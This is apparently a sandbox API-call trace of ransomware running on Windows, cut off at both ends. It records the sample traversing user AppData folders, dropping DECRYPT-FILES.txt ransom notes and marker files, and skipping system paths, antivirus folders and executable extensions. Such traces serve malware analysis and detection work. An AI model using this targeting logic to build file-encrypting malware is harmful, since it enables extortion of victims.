dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0180.337] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=5353) returned 1 [0180.337] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0180.337] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0180.341] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0180.341] CloseHandle (hObject=0x268) returned 1 [0180.342] CloseHandle (hObject=0x264) returned 1 [0180.342] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.342] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b695060, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0xaa458780, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa458780, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Macromedia", cAlternateFileName="MACROM~1")) returned 1 [0180.342] lstrcmpW (lpString1="Macromedia", lpString2=".") returned 1 [0180.344] lstrcmpW (lpString1="Macromedia", lpString2="..") returned 1 [0180.344] lstrcatW (in: lpString1="Macromedia", lpString2="\\" | out: lpString1="Macromedia\\") returned="Macromedia\\" [0180.344] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="Macromedia\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\" [0180.344] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\", lpSrch="\\Program Files") returned 0x0 [0180.344] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\", lpSrch=":\\Windows") returned 0x0 [0180.344] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\", lpSrch="\\Games\\") returned 0x0 [0180.349] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.350] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.350] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.350] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.350] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.350] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\", lpSrch="\\All Users") returned 0x0 [0180.350] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.350] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.350] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.351] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\", lpSrch="AhnLab") returned 0x0 [0180.351] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.351] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\") returned 57 [0180.351] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.351] wsprintfW (in: param_1=0x36fe7f0, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\\\0a16c9.tmp") returned 68 [0180.351] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x264 [0180.355] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\") returned 57 [0180.355] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.355] wsprintfW (in: param_1=0x36fe7f0, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\\\DECRYPT-FILES.txt") returned 75 [0180.355] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.357] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\") returned 57 [0180.358] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\*" [0180.358] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\*", lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b695060, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0xee9f64a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee9f64a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4798f8 [0180.361] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.361] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b695060, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0xee9f64a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee9f64a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.361] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.361] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.361] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xee9f64a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xee9f64a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee9f64a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.361] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.361] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.361] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.361] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.361] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.361] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.361] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.361] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.361] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.361] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.361] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.362] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.362] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.362] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.362] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.362] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\") returned 57 [0180.362] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.362] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\" [0180.362] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\0a16c9.tmp" [0180.362] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.362] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.362] CloseHandle (hObject=0x0) returned 0 [0180.362] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.362] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa458780, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa458780, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa47e8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.362] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.362] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b695060, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0xaa47e8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa47e8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Flash Player", cAlternateFileName="FLASHP~1")) returned 1 [0180.362] lstrcmpW (lpString1="Flash Player", lpString2=".") returned 1 [0180.362] lstrcmpW (lpString1="Flash Player", lpString2="..") returned 1 [0180.362] lstrcatW (in: lpString1="Flash Player", lpString2="\\" | out: lpString1="Flash Player\\") returned="Flash Player\\" [0180.362] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\", lpString2="Flash Player\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\" [0180.363] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpSrch="\\Program Files") returned 0x0 [0180.363] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpSrch=":\\Windows") returned 0x0 [0180.363] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpSrch="\\Games\\") returned 0x0 [0180.363] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.363] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.363] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.363] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.363] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.363] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpSrch="\\All Users") returned 0x0 [0180.363] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.363] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.363] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.363] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpSrch="AhnLab") returned 0x0 [0180.363] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.363] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\") returned 70 [0180.363] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.363] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\\\0a16c9.tmp") returned 81 [0180.363] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x26c [0180.374] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\") returned 70 [0180.374] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.374] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\\\DECRYPT-FILES.txt") returned 88 [0180.374] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.377] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\") returned 70 [0180.377] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\*" [0180.377] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b695060, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0xeea1c600, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeea1c600, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0180.377] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.377] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b695060, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0xeea1c600, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeea1c600, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.377] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.377] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.377] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d4582b0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0xaa47e8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa47e8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="#SharedObjects", cAlternateFileName="#SHARE~1")) returned 1 [0180.377] lstrcmpW (lpString1="#SharedObjects", lpString2=".") returned -1 [0180.377] lstrcmpW (lpString1="#SharedObjects", lpString2="..") returned -1 [0180.377] lstrcatW (in: lpString1="#SharedObjects", lpString2="\\" | out: lpString1="#SharedObjects\\") returned="#SharedObjects\\" [0180.377] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\", lpString2="#SharedObjects\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\" [0180.377] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpSrch="\\Program Files") returned 0x0 [0180.377] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpSrch=":\\Windows") returned 0x0 [0180.377] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpSrch="\\Games\\") returned 0x0 [0180.377] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.377] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.377] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.377] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.378] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.378] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpSrch="\\All Users") returned 0x0 [0180.378] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.378] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.378] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.378] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpSrch="AhnLab") returned 0x0 [0180.378] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.378] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\") returned 85 [0180.378] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.378] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\\\0a16c9.tmp") returned 96 [0180.378] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x274 [0180.379] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\") returned 85 [0180.379] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.379] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\\\DECRYPT-FILES.txt") returned 103 [0180.379] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\#sharedobjects\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.418] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\") returned 85 [0180.418] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\*" [0180.418] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\#SharedObjects\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d4582b0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0xeea42760, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeea42760, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0180.418] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.418] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d4582b0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0xeea42760, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeea42760, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.418] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.418] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.418] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeea42760, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeea42760, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeea42760, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, 